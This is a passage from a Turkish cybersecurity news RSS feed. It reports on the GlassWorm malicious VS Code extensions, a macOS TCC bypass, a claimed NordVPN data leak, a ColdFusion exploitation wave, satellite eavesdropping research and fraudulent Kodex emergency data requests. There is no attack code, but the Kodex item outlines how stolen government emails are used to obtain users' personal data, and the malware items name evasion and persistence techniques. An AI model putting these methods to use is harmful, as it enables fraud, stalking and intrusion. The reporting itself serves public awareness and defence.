<p data-start="2166" data-end="2516"><strong data-start="2166" data-end="2191">Soruşturma Başlatıldı</strong><br>İçişleri Bakanı Ali Yerlikaya, şüpheliler hakkında savcılıklarca soruşturma başlatıldığını belirterek, <strong data-start="2295" data-end="2432">“Bu kişiler aracılığıyla işlenebilecek siber dolandırıcılık suçlarıyla vatandaşlarımızın maddi ve manevi zarar görmesini engelledik.”</strong> ifadesini kullandı. Yerlikaya, operasyonlarda görev alan tüm birimleri tebrik etti.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Yeni GlassWorm Zararlı Yazılım Dalgası macOS Sistemleri Trojenli Kripto Cüzdanlarla Hedef Alıyor</title>
            <link>https://cumha.com.tr/yeni-glassworm-zararli-yazilim-dalgasi-macos-sistemleri-trojenli-kripto-cuzdanlarla-hedef-aliyor</link>
            <guid>https://cumha.com.tr/yeni-glassworm-zararli-yazilim-dalgasi-macos-sistemleri-trojenli-kripto-cuzdanlarla-hedef-aliyor</guid>
            <description><![CDATA[ GlassWorm adlı zararlı yazılımın dördüncü dalgası, macOS kullanan geliştiricileri hedef alıyor. OpenVSX ve Visual Studio Marketplace üzerinden yayılan kötü amaçlı VS Code eklentileri, kripto cüzdan uygulamalarının trojenli sürümlerini dağıtarak kimlik bilgileri, geliştirici hesapları ve dijital varlıkları ele geçirmeyi amaçlıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_695d86c4cd512.webp" length="42456" type="image/webp"/>
            
            <pubDate>Wed, 07 Jan 2026 01:04:07 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>glassworm zararlı yazılım nedir, macos vscode zararlı eklentiler, trojenli kripto cüzdan saldırısı, openvsx güvenlik uyarısı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Siber güvenlik araştırmacıları, <strong data-start="497" data-end="560">GlassWorm zararlı yazılım kampanyasının dördüncü dalgasının</strong> macOS sistemleri hedef aldığını ortaya koydu. Koi Security tarafından tespit edilen yeni saldırı dalgasında, OpenVSX kayıt defterinde yayımlanan kötü amaçlı VS Code eklentileri üzerinden <strong data-start="748" data-end="787">trojenli kripto cüzdan uygulamaları</strong> dağıtılıyor.</p>
<p></p>
<p data-start="802" data-end="1188">GlassWorm ilk kez ekim ayında ortaya çıktı. Zararlı yazılım, <strong data-start="863" data-end="895">görünmez Unicode karakterler</strong> kullanılarak gizlenen eklentiler aracılığıyla GitHub, npm ve OpenVSX hesap bilgilerini, ayrıca tarayıcı tabanlı kripto cüzdan verilerini ele geçirmeyi hedefledi. Önceki dalgalarda Windows sistemler odak alınırken, son kampanyada yalnızca <strong data-start="1134" data-end="1160">macOS kullanıcılarının</strong> hedef seçildiği bildirildi.</p>
<p data-start="1190" data-end="1581"><strong data-start="1190" data-end="1233">Yeni Saldırı Yöntemi ve Teknik Detaylar</strong><br>Araştırmacılara göre son dalgada, önceki sürümlerde kullanılan Unicode gizleme veya Rust tabanlı ikililer yerine, <strong data-start="1348" data-end="1387">AES-256-CBC ile şifrelenmiş bir yük</strong> derlenmiş JavaScript kodu içine gömülüyor. Zararlı eklentilerin, kurulumu takip eden <strong data-start="1473" data-end="1500">15 dakikalık gecikmeyle</strong> çalıştığı ve bu yöntemin analiz ortamlarından kaçınmayı amaçladığı ifade edildi.</p>
<p data-start="1583" data-end="1861">GlassWorm’un yeni sürümü, PowerShell yerine <strong data-start="1627" data-end="1642">AppleScript</strong> kullanıyor ve kalıcılık için Windows Kayıt Defteri yerine <strong data-start="1701" data-end="1717">LaunchAgents</strong> mekanizmasından yararlanıyor. Komuta-kontrol altyapısında ise önceki kampanyalarda da kullanılan <strong data-start="1815" data-end="1850">Solana blokzinciri tabanlı yapı</strong> korunuyor.</p>
<p data-start="1863" data-end="2297"><strong data-start="1863" data-end="1913">Trojenli Donanım Cüzdanları ve Keychain Hedefi</strong><br>Zararlı yazılımın, 50’den fazla tarayıcı kripto eklentisini, geliştirici hesap bilgilerini ve tarayıcı verilerini hedef almasının yanı sıra artık <strong data-start="2060" data-end="2091">macOS Keychain parolalarına</strong> erişmeye çalıştığı kaydedildi. Ayrıca sistemde <strong data-start="2139" data-end="2170">Ledger Live ve Trezor Suite</strong> gibi donanım cüzdan uygulamalarını tespit ederek, bunları trojenli sürümlerle değiştirmeyi amaçlayan yeni bir yetenek eklendi.</p>
<p data-start="2299" data-end="2627">Koi Security, bu mekanizmanın şu an için başarısız olduğunu ve trojenli cüzdan dosyalarının boş döndüğünü belirtti. Kurum, “Bu durum saldırganların macOS cüzdan trojenlerini henüz hazırlamakta olduğunu ya da altyapının geçiş aşamasında bulunduğunu gösteriyor. Ancak tüm diğer zararlı işlevler aktif durumda.” açıklamasını yaptı.</p>
<p data-start="2629" data-end="2906"><strong data-start="2629" data-end="2661">Binlerce İndirme, Artan Risk</strong><br>OpenVSX üzerinde yayımlanan ve zararlı olduğu tespit edilen eklentilerden bazılarının <strong data-start="2748" data-end="2773">33 bini aşkın indirme</strong> sayısına ulaştığı görüldü. Uzmanlar, bu tür rakamların güvenilirlik algısı oluşturmak için <strong data-start="2865" data-end="2892">manipüle edilebildiğine</strong> dikkat çekti.</p>
<p data-start="2908" data-end="3168">Güvenlik uzmanları, ilgili eklentileri yükleyen geliştiricilerin <strong data-start="2973" data-end="2992">derhal kaldırma</strong>, GitHub parolalarını sıfırlama, npm erişim anahtarlarını iptal etme, sistemlerini detaylı şekilde kontrol etme ve gerekirse işletim sistemini yeniden kurma çağrısında bulundu.</p>
<p data-start="3170" data-end="3305"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>macOS’te Kritik TCC Açığı Gündemde: CVE-2025-43530 ile Hassas Verilere İzinsiz Erişim Mümkün</title>
            <link>https://cumha.com.tr/macoste-kritik-tcc-acigi-gundemde-cve-2025-43530-ile-hassas-verilere-izinsiz-erisim-mumkun</link>
            <guid>https://cumha.com.tr/macoste-kritik-tcc-acigi-gundemde-cve-2025-43530-ile-hassas-verilere-izinsiz-erisim-mumkun</guid>
            <description><![CDATA[ Apple’ın masaüstü işletim sistemi macOS’te tespit edilen kritik bir güvenlik açığı, saldırganların Transparency, Consent, and Control (TCC) mekanizmasını tamamen aşarak kullanıcı onayı olmadan hassas verilere erişmesine olanak tanıyor. CVE-2025-43530 koduyla takip edilen açık, Apple tarafından macOS 26.2 sürümünde yayımlanan güvenlik güncellemesiyle giderildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_695d837569e75.webp" length="44816" type="image/webp"/>
            
            <pubDate>Wed, 07 Jan 2026 00:50:09 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>macos tcc açığı nedir, cve-2025-43530 güvenlik açığı, macos 26.2 güvenlik güncellemesi, apple tcc bypass sorunu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>macOS işletim sisteminde ortaya çıkarılan <strong data-start="534" data-end="552">CVE-2025-43530</strong> numaralı güvenlik açığının, Apple’ın <strong data-start="590" data-end="634">Transparency, Consent, and Control (TCC)</strong> koruma mekanizmasını tamamen devre dışı bırakabildiği bildirildi. Açık sayesinde saldırganların, kullanıcıdan herhangi bir izin almadan hassas verilere erişebildiği belirtildi.</p>
<p></p>
<p data-start="813" data-end="1124">Güvenlik araştırmacılarının paylaştığı bilgilere göre zafiyet, <strong data-start="876" data-end="901">VoiceOver framework’ü</strong> üzerinden çalışan <strong data-start="920" data-end="939">com.apple.scrod</strong> sistem servisini hedef alıyor. Bu yapı istismar edilerek Apple tarafından imzalanmış süreçler içinde kod çalıştırılabildiği, bunun için yönetici yetkisine gerek duyulmadığı kaydedildi.</p>
<p data-start="1126" data-end="1459"><strong data-start="1126" data-end="1168">Kod Enjeksiyonu ve TOCTOU Birlikteliği</strong><br>Açığın istismar sürecinde iki kritik unsurun bir araya geldiği aktarıldı. Bunların, Apple imzalı süreçlere yönelik <strong data-start="1284" data-end="1303">kod enjeksiyonu</strong> ve bir <strong data-start="1311" data-end="1349">Time-of-Check-Time-of-Use (TOCTOU)</strong> yarış durumu olduğu ifade edildi. Bu kombinasyonun, TCC korumasını tamamen etkisiz hale getirdiği vurgulandı.</p>
<p data-start="1461" data-end="1720">Bu yöntemle saldırganların; <strong data-start="1489" data-end="1620">belgelere erişebildiği, mikrofonu kullanabildiği, Finder ile etkileşime girebildiği ve AppleScript komutlarını çalıştırabildiği</strong>, tüm bunların ise kullanıcıya herhangi bir bildirim gösterilmeden gerçekleştirilebildiği aktarıldı.</p>
<p data-start="1722" data-end="2094"><strong data-start="1722" data-end="1757">Apple’dan Güvenlik Güncellemesi</strong><br>Apple, söz konusu güvenlik açığını <strong data-start="1793" data-end="1807">macOS 26.2</strong> sürümünde yayımladığı güncellemeyle giderdi. Güncelleme kapsamında, <strong data-start="1876" data-end="1917">com.apple.private.accessibility.scrod</strong> yetkisinin süreç denetim belirteci üzerinden doğrulanmasının zorunlu hale getirildiği, bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin kapatıldığı bildirildi.</p>
<p data-start="2096" data-end="2310">Apple, macOS 26.2 güvenlik güncellemesine ilişkin teknik detayları resmi güvenlik bülteninde paylaştı. Kullanıcıların, <strong data-start="2215" data-end="2255">Sistem Ayarları &gt; Yazılım Güncelleme</strong> adımlarını izleyerek en son sürüme geçmeleri önerildi.</p>
<p data-start="2312" data-end="2434"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Dark Web Informer NordVPN iddiasını duyurdu: “Salesforce veritabanı ve API anahtarları sızdırıldı”</title>
            <link>https://cumha.com.tr/dark-web-informer-nordvpn-iddiasini-duyurdu-salesforce-veritabani-ve-api-anahtarlari-sizdirildi</link>
            <guid>https://cumha.com.tr/dark-web-informer-nordvpn-iddiasini-duyurdu-salesforce-veritabani-ve-api-anahtarlari-sizdirildi</guid>
            <description><![CDATA[ Siber güvenlik izleme platformu Dark Web Informer, NordVPN’e ait Salesforce ve Jira verilerinin yer aldığı bir geliştirme sunucusunun ele geçirildiğini öne sürdü. Panama merkezli VPN şirketine ait olduğu belirtilen 10’dan fazla veritabanı kaynak kodu, API anahtarları ve hassas teknik bilgilerin bir dark web forumunda paylaşıldığı iddia edildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_695b0b3fe085a.webp" length="56744" type="image/webp"/>
            
            <pubDate>Mon, 05 Jan 2026 03:52:36 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>nordvpn veri sızıntısı iddiası, dark web informer nordvpn haberi, salesforce api anahtarı sızıntısı, vpn şirketi siber saldırı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Siber tehdit istihbarat hesabı <strong data-start="512" data-end="533">Dark Web Informer</strong>, NordVPN’e yönelik ciddi bir veri sızıntısı iddiasını kamuoyuna duyurdu. Paylaşıma göre, <strong data-start="623" data-end="633">“1011”</strong> takma adlı bir tehdit aktörü, NordVPN’in geliştirme ortamına yetkisiz erişim sağladığını ve kritik sistem verilerini ele geçirdiğini öne sürdü.</p>
<p></p>
<p><img src="https://cumha.com.tr/uploads/images/202601/image_870x_695b0a81880d6.webp" alt=""></p>
<p data-start="779" data-end="1063"><strong data-start="779" data-end="812">Dark Web Forumunda Paylaşıldı</strong><br>Dark Web Informer tarafından aktarılan bilgilere göre, sızdırıldığı iddia edilen veriler bir dark web forumunda satışa veya paylaşıma açıldı. Tehdit aktörü, ele geçirilen bilgilerin <strong data-start="995" data-end="1045">NordVPN’e ait Salesforce veritabanı içerikleri</strong> olduğunu savundu.</p>
<p data-start="1065" data-end="1328"><strong data-start="1065" data-end="1099">Brute Force ile Erişim İddiası</strong><br>Paylaşımda, saldırganın <strong data-start="1124" data-end="1221">yanlış yapılandırılmış bir NordVPN geliştirme sunucusunu brute force yöntemiyle ele geçirdiği</strong> ileri sürüldü. Bu sunucuda Salesforce ve Jira sistemlerine ait bilgilerin birlikte tutulduğu iddia edildi.</p>
<p data-start="1330" data-end="1606"><strong data-start="1330" data-end="1366">Sızdırıldığı Öne Sürülen Veriler</strong><br>Dark Web Informer, tehdit aktörünün paylaştığını iddia ettiği örnekler üzerinden şu bilgilerin ele geçirildiğini bildirdi:<br>10’dan fazla veritabanı kaynak kodu, Salesforce API anahtarları, Jira erişim tokenları ve ek hassas teknik bilgiler.</p>
<p><img src="https://cumha.com.tr/uploads/images/202601/image_870x_695b0a8dec95d.webp" alt=""></p>
<p data-start="1608" data-end="1909"><strong data-start="1608" data-end="1636">SQL Dökümleri Paylaşıldı</strong><br>Forumda yayınlanan örnek SQL dökümlerinde, <strong data-start="1680" data-end="1713">“salesforce_api_step_details”</strong> ve <strong data-start="1717" data-end="1731">“api_keys”</strong> tablolarına ait yapılar ile ayrıntılı veritabanı şema bilgilerinin yer aldığı öne sürüldü. Bu örneklerin, iddiaların gerçekliğini desteklemek amacıyla paylaşıldığı ifade edildi.</p>
<p data-start="1911" data-end="2207"><strong data-start="1911" data-end="1952">NordVPN’den Resmî Açıklama Bekleniyor</strong><br>Sızıntı iddialarına ilişkin olarak NordVPN tarafından şu ana kadar kamuoyuna yansımış resmî bir açıklama bulunmuyor. Uzmanlar, iddiaların doğrulanması hâlinde bunun <strong data-start="2118" data-end="2195">VPN hizmetlerine duyulan güven açısından önemli sonuçlar doğurabileceğini</strong> belirtiyor.</p>
<p data-start="2209" data-end="2346"></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Küresel siber saldırı dalgasında Adobe ColdFusion sunucuları hedefte: 2,5 milyonu aşan kötü amaçlı istek tespit edildi</title>
            <link>https://cumha.com.tr/kuresel-siber-saldiri-dalgasinda-adobe-coldfusion-sunuculari-hedefte-25-milyonu-asan-koetu-amacli-istek-tespit-edildi</link>
            <guid>https://cumha.com.tr/kuresel-siber-saldiri-dalgasinda-adobe-coldfusion-sunuculari-hedefte-25-milyonu-asan-koetu-amacli-istek-tespit-edildi</guid>
            <description><![CDATA[ Adobe ColdFusion sunucularına yönelik 2,5 milyondan fazla kötü amaçlı isteğin kaydedildiği geniş çaplı bir siber saldırı kampanyası ortaya çıktı. 47’den fazla teknoloji platformunu etkileyen saldırıların büyük bölümünün Noel Günü gerçekleşmesi, saldırganların düşük güvenlik farkındalığını hedef aldığını gösterdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_695a43a564f38.webp" length="60626" type="image/webp"/>
            
            <pubDate>Sun, 04 Jan 2026 13:41:20 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>adobe coldfusion siber saldırı kampanyası, noel günü siber saldırılar, cve-2022-26134 ognl injection, java tabanlı sistemler güvenlik açıkları</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Siber güvenlik araştırmacıları, <strong data-start="514" data-end="547">Adobe ColdFusion sunucularını</strong> da kapsayan <strong data-start="560" data-end="620">küresel ölçekte koordine edilmiş bir istismar kampanyası</strong> yürütüldüğünü açıkladı. Analizlere göre, <strong data-start="662" data-end="703">2,5 milyondan fazla kötü amaçlı istek</strong>, ColdFusion başta olmak üzere 47’den fazla farklı teknoloji platformuna yöneltildi.</p>
<p></p>
<p data-start="789" data-end="1130"><strong data-start="789" data-end="845">20 Yıllık Açıklardan Güncel Zafiyetlere Kadar Tarama</strong><br>Uzmanlar, saldırıların hem <strong data-start="873" data-end="915">20 yıla varan eski güvenlik açıklarını</strong> hem de <strong data-start="923" data-end="975">2023–2024 döneminde açıklanan kritik zafiyetleri</strong> hedef aldığını belirtti. ColdFusion’a odaklanan aşamada, <strong data-start="1033" data-end="1074">10’dan fazla kritik güvenlik açığının</strong> aktif biçimde istismar edilmeye çalışıldığı kaydedildi.</p>
<p data-start="1132" data-end="1394"><strong data-start="1132" data-end="1173">Saldırıların Zamanlaması Dikkat Çekti</strong><br>Saldırı trafiğinin <strong data-start="1193" data-end="1220">yüzde 68’inin Noel Günü</strong> gerçekleştiği bilgisi paylaşıldı. Araştırmacılar, bu zamanlamanın <strong data-start="1287" data-end="1352">SOC ekiplerinin düşük kapasiteyle çalıştığı tatil dönemlerini</strong> bilinçli olarak hedef aldığını vurguladı.</p>
<p data-start="1396" data-end="1722"><strong data-start="1396" data-end="1431">Saldırı Kaynakları ve Teknikler</strong><br>Analizlerde, saldırı trafiğinin büyük bölümünün <strong data-start="1480" data-end="1499">134.122.136.119</strong> ve <strong data-start="1503" data-end="1521">134.122.136.96</strong> IP adreslerinden geldiği tespit edildi. Kampanya kapsamında <strong data-start="1582" data-end="1622">Interactsh ile out-of-band doğrulama</strong>, <strong data-start="1624" data-end="1670">WDDX deserialization açıklarının istismarı</strong> ve <strong data-start="1674" data-end="1710">JNDI/LDAP enjeksiyon saldırıları</strong> kullanıldı.</p>
<p data-start="1724" data-end="2023"><strong data-start="1724" data-end="1755">Öne Çıkan Güvenlik Açıkları</strong><br>Saldırılarda en sık hedef alınan zafiyetler arasında <strong data-start="1809" data-end="1855">CVE-2022-26134 (Confluence OGNL Injection)</strong> ve <strong data-start="1859" data-end="1889">CVE-2014-6271 (Shellshock)</strong> yer aldı. Uzmanlar, ColdFusion’un bu kampanyanın yalnızca bir parçası olduğunu, saldırı yüzeyinin çok daha geniş olduğunu ifade etti.</p>
<p data-start="2025" data-end="2300"><strong data-start="2025" data-end="2047">Acil Önlem Çağrısı</strong><br>Güvenlik ekiplerine, ilgili IP adreslerinin ve bağlantılı ASN’lerin engellenmesi, <strong data-start="2130" data-end="2202">ColdFusion ve Java tabanlı altyapıların öncelikli olarak yamalanması</strong> ve özellikle <strong data-start="2216" data-end="2278">tatil dönemlerine ait log kayıtlarının detaylı incelenmesi</strong> çağrısında bulunuldu.</p>
<p data-start="2302" data-end="2459"><strong data-start="2302" data-end="2314"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Ekoparty’de Tanıtılan PWNSAT Projesiyle Uydu Haberleşmesinin Nasıl Dinlenebildiği Adım Adım Gösterildi</title>
            <link>https://cumha.com.tr/ekopartyde-tanitilan-pwnsat-projesiyle-uydu-haberlesmesinin-nasil-dinlenebildigi-adim-adim-goesterildi</link>
            <guid>https://cumha.com.tr/ekopartyde-tanitilan-pwnsat-projesiyle-uydu-haberlesmesinin-nasil-dinlenebildigi-adim-adim-goesterildi</guid>
            <description><![CDATA[ Dünyanın önde gelen İspanyolca konuşulan siber güvenlik konferansı Ekoparty’de tanıtılan açık kaynaklı PWNSAT 0.1 projesi, uydu haberleşmelerinin ne kadar savunmasız olabildiğini ortaya koydu. Araştırmacılar, yazılım tabanlı radyo kullanarak bir uydunun telemetri ve telekomut verilerinin nasıl ele geçirilebildiğini teknik ayrıntılarıyla paylaştı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_695a3e0639acf.webp" length="42006" type="image/webp"/>
            
            <pubDate>Sun, 04 Jan 2026 13:16:54 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>PWNSAT projesi nedir, Ekoparty siber güvenlik konferansı, uydu haberleşmesi nasıl dinlenir, LoRa uydu iletişimi güvenliği</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Dünyanın en büyük İspanyolca konuşulan siber güvenlik konferanslarından Ekoparty’de, <strong data-start="585" data-end="599">PWNSAT 0.1</strong> adlı açık kaynaklı ve bilerek zafiyetli tasarlanan uydu altyapı projesi kamuoyuna tanıtıldı. Proje, uydu ve havacılık siber güvenliği alanındaki bilgi eksikliğine dikkat çekmeyi ve uygulamalı araştırmayı teşvik etmeyi amaçlıyor.</p>
<p></p>
<p data-start="830" data-end="1168">Araştırmacılar tarafından paylaşılan teknik çalışmada, <strong data-start="885" data-end="962">PWNSAT ile yer istasyonu arasındaki haberleşmenin pasif olarak dinlenmesi</strong> ayrıntılı biçimde belgelendi. Çalışmada, yazılım tabanlı radyo sistemleri kullanılarak uyduya ait <strong data-start="1061" data-end="1146">telemetri ve telekomut sinyallerinin tespit edilmesi, yakalanması ve çözümlenmesi</strong> adım adım gösterildi.</p>
<p data-start="1170" data-end="1595"><strong data-start="1170" data-end="1217">Yazılım Tabanlı Radyo ile Dinleme Senaryosu</strong><br>Araştırmada, gerçek dünyadaki bir dinleme saldırısını taklit eden bir laboratuvar ortamı kuruldu. Hedef olarak, donanımı, yazılımı ve yer istasyonu bileşenleriyle bilerek savunmasız bırakılan <strong data-start="1410" data-end="1432">PWNSAT 0.1 FlatSat</strong> sistemi seçildi. RTL-SDR ve HackRF One cihazları ile açık kaynak yazılımlar kullanılarak, uydunun aşağı yönlü telemetri ve yukarı yönlü telekomut trafiği izlendi.</p>
<p data-start="1597" data-end="1910"><strong data-start="1597" data-end="1633">“Gizli Frekans Güvenli Değildir”</strong><br>Spektrum taraması sonucunda, uydunun LoRa tabanlı haberleşme yaptığı <strong data-start="1703" data-end="1727">915 MHz ISM bandında</strong> belirgin sinyal patlamaları tespit edildi. Araştırmacılar, bu bulgunun “gizli frekans” yaklaşımının tek başına bir güvenlik önlemi olmadığını açık biçimde ortaya koyduğunu vurguladı.</p>
<p data-start="1912" data-end="2280"><strong data-start="1912" data-end="1951">Şifreleme Olmadan Aktarılan Veriler</strong><br>Çalışmada, CCSDS Space Packet Protocol kullanan telemetri verilerinin uygulama katmanında şifrelenmemiş olması nedeniyle, ham radyo sinyallerinin <strong data-start="2098" data-end="2146">anlamlı sensör verilerine dönüştürülebildiği</strong> gösterildi. BME280 ve MPU6050 sensörlerinden gelen çevresel ve hareket verilerinin gerçek zamanlı olarak çözümlenebildiği kaydedildi.</p>
<p data-start="2282" data-end="2615"><strong data-start="2282" data-end="2321">Gelecekteki Risklere Dikkat Çekildi</strong><br>Araştırmacılar, pasif dinlemenin çoğu zaman son adım olmadığını belirterek, telemetri verilerinin ele geçirilmesinin uydunun çalışma döngülerini ve sağlık durumunu açığa çıkardığını ifade etti. Bu durumun, daha ileri mantıksal ya da fiziksel saldırılar için zemin hazırlayabileceği kaydedildi.</p>
<p data-start="2617" data-end="2865">Paylaşılan çalışmada, tüm deneylerin <strong data-start="2654" data-end="2723">eğitim ve araştırma amacıyla, kontrollü bir laboratuvar ortamında</strong> gerçekleştirildiği özellikle vurgulandı. Yetkisiz uydu haberleşmesi dinlemenin ulusal ve uluslararası hukuka aykırı olabileceği hatırlatıldı.</p>
<p data-start="2867" data-end="3003"><strong data-start="2867" data-end="2879"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Uzmanları Uyardı: Kodex EDR Sistemi Sahte Polis Kimlikleriyle Küresel Bir Veri Silahına Dönüştü</title>
            <link>https://cumha.com.tr/siber-guvenlik-uzmanlari-uyardi-kodex-edr-sistemi-sahte-polis-kimlikleriyle-kuresel-bir-veri-silahina-doenustu</link>
            <guid>https://cumha.com.tr/siber-guvenlik-uzmanlari-uyardi-kodex-edr-sistemi-sahte-polis-kimlikleriyle-kuresel-bir-veri-silahina-doenustu</guid>
            <description><![CDATA[ Kodex Global üzerinden yürütülen sahte Emergency Data Request taleplerinin, çalıntı devlet e-postaları kullanılarak kripto borsalarından sosyal ağlara kadar geniş bir alanda kişisel verileri açığa çıkardığı ortaya konuldu. Uzmanlar, sistemin 2024’ten bu yana yeraltı piyasasında organize bir hizmet modeline dönüştüğünü ve fiziksel şiddete varan sonuçlar doğurduğunu belirtti. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202601/image_870x_695a3b076337c.webp" length="102824" type="image/webp"/>
            
            <pubDate>Sun, 04 Jan 2026 13:04:35 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>kodex edr nedir, fake emergency data request nasıl çalışır, kodex global siber güvenlik riski, sahte polis epostası edr</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p>Siber tehdit istihbaratı araştırmaları, <strong data-start="564" data-end="595">Kodex Global EDR sisteminin</strong> kötüye kullanımının münferit olaylar olmaktan çıktığını ve küresel ölçekte organize bir yeraltı hizmetine dönüştüğünü ortaya koydu. Tehdit aktörlerinin, sahte polis ve kamu görevlisi kimlikleriyle şirketlerden ve platformlardan acil veri taleplerinde bulunduğu belirtildi.</p>
<p></p>
<p data-start="870" data-end="1292"><strong data-start="870" data-end="899">BreachForums’ta İlk Alarm</strong><br>2024’ün başlarında “Tamagami” adlı bir tehdit aktörünün BreachForums’ta yaptığı paylaşım, sistemin nasıl istismar edildiğini gözler önüne serdi. Söz konusu paylaşımda, “Kodex Global hesabımı satıyorum. Binance veya Coinbase üzerinden EDR ile istediğiniz kişiyi sorgulayabilirsiniz.” ifadeleri yer aldı. İddialara göre tekil sorgu bedelleri 300 dolara, tam erişim ise 5 bin dolara kadar çıktı.</p>
<p data-start="1294" data-end="1635"><strong data-start="1294" data-end="1341">Hedefte Sosyal Ağlar ve Kripto Platformları</strong><br>Araştırmalara göre Kodex üzerinden yapılan sahte acil talepler yalnızca kripto borsalarıyla sınırlı kalmadı. Discord, Tinder ve LinkedIn gibi sosyal platformların da listede yer aldığı, bu yolla kullanıcıların IP adresleri, telefon numaraları ve fiziksel adreslerinin elde edildiği kaydedildi.</p>
<p data-start="1637" data-end="2086"><strong data-start="1637" data-end="1671">Sistem Nasıl İstismar Ediliyor</strong><br>Uzmanlar, Kodex altyapısının teknik olarak güvenli olduğunu ancak insan faktörünün zayıf halka haline geldiğini vurguladı. Sürecin, bilgi hırsızlığı zararlıları ve oltalama saldırılarıyla ele geçirilen .gov ve .police uzantılı e-posta hesaplarıyla başladığı aktarıldı. Bu adreslerle Kodex’e kayıt yapıldığı ve “hayati tehlike” veya “terör şüphesi” gibi gerekçelerle platformlardan veri talep edildiği ifade edildi.</p>
<p data-start="2088" data-end="2464"><strong data-start="2088" data-end="2117">“EDR as a Service” Dönemi</strong><br>Şubat 2025 tarihli paylaşımlar, sahte Kodex hesaplarının fiyatlarının 400 dolara kadar düştüğünü gösterdi. Bu durumun, düşük profilli saldırganların da sistemi kullanabilir hale gelmesine yol açtığı bildirildi. Aralık 2025 itibarıyla bazı grupların, “doğrulanmış Avrupa devlet e-postalarıyla EDR geçeriz” şeklinde açık ilanlar verdiği kaydedildi.</p>
<p data-start="2466" data-end="2840"><strong data-start="2466" data-end="2500">Sanal Veriden Fiziksel Tehdide</strong><br>Elde edilen adres ve iletişim bilgilerinin yalnızca ifşa için değil, fiziksel tehditler için de kullanıldığı belirtildi. Uzmanlar, saldırganların bu verilerle sahte bomba ihbarı veya rehine bildirimi yaparak polis ekiplerini hedef adreslere yönlendirdiğini, bu yöntemin geçmişte ABD’de ölümle sonuçlanan olaylara neden olduğunu hatırlattı.</p>
<p data-start="2842" data-end="3260"><strong data-start="2842" data-end="2890">APT Grupları ve Fidye Çeteleri de Kullanıyor</strong><br>Analizlerde, Lapsus$ ve Scattered Spider gibi organize grupların yanı sıra devlet destekli APT yapılanmalarının da Kodex EDR’yi stratejik bir araç olarak gördüğü ifade edildi. Fidye gruplarının, şirket yöneticilerinin aile bireylerine ulaşarak baskıyı artırdığı; APT gruplarının ise diplomat, gazeteci ve muhalifleri zararlı yazılım kullanmadan izleyebildiği aktarıldı.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlik Araştırmacısı Ebubekir Bastama WhatsApp Web’in Numara Doğrulama Mekanizmasını 100 Bin Numara Üzerinden Analiz Etti</title>
            <link>https://cumha.com.tr/siber-guvenlik-arastirmacisi-ebubekir-bastama-whatsapp-webin-numara-dogrulama-mekanizmasini-100-bin-numara-uzerinden-analiz-etti</link>
            <guid>https://cumha.com.tr/siber-guvenlik-arastirmacisi-ebubekir-bastama-whatsapp-webin-numara-dogrulama-mekanizmasini-100-bin-numara-uzerinden-analiz-etti</guid>
            <description><![CDATA[ Siber Güvenlik Araştırmacısı Ebubekir Bastama tarafından yayımlanan teknik makalede, WhatsApp Web istemcisinin numara doğrulama davranışı 100 bin telefon numarası üzerinden incelendi. Çalışma, resmi istemci API’leri kullanılarak yapılan testlerde %100 doğrulukla doğrulama sonuçları elde edildiğini ortaya koydu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202512/image_870x_6955455c44228.webp" length="15954" type="image/webp"/>
            
            <pubDate>Wed, 31 Dec 2025 18:47:03 +0300</pubDate>
            <dc:creator>CUMHA Haber Merkezi</dc:creator>
            <media:keywords>whatsapp web numara doğrulama analizi, ebubekir bastama siber güvenlik araştırması, whatsapp web rate limit testi, whatsapp osint teknik inceleme</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br>Siber Güvenlik Araştırmacısı <strong data-start="508" data-end="528">Ebubekir Bastama</strong>, WhatsApp Web istemcisinin telefon numarası doğrulama davranışına ilişkin kapsamlı bir teknik inceleme yayımladı. Çalışmada, WhatsApp Web’in resmi istemci davranışları temel alınarak gerçekleştirilen testlerde, numaraların WhatsApp kullanıcısı olup olmadığının sunucu taraflı doğrulama mekanizmalarıyla belirlendiği kaydedildi.</p>
<p></p>
